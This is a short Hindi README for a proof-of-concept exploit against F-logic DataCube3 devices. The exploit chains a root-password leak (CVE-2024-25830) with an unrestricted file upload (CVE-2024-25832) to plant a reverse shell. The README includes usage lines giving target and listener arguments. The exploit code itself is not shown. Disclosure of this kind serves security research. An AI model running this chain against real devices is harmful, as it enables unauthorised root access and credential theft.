
CVE-2024-25832 के लिए पीओसी स्क्रिप्ट: एक्सप्लॉइट चेन रिवर्स शेल, सूचना प्रकटीकरण (रूट पासवर्ड लीक) + डेटाक्यूब3 में असीमित फ़ाइल अपलोड
यह रिपॉजिटरी DataCube3 उपकरणों को लक्षित करने वाली दो-चरणीय शोषण श्रृंखला के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) प्रस्तुत करती है। यह रूट पासवर्ड निकालने के लिए CVE-2024-25830 (अनुचित पहुँच नियंत्रण) और रिवर्स शेल स्क्रिप्ट तैनात करने के लिए CVE-2024-25832 (असीमित फ़ाइल अपलोड) को जोड़ती है। यह PoC ब्लॉग पोस्ट "DataCube3 Vulnerability Report" में विस्तृत भेद्यता विश्लेषण का पूरक है।
सभी F-logic DataCube3 उपकरण संस्करण 1.0।
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

केवल शैक्षिक उद्देश्य के लिए।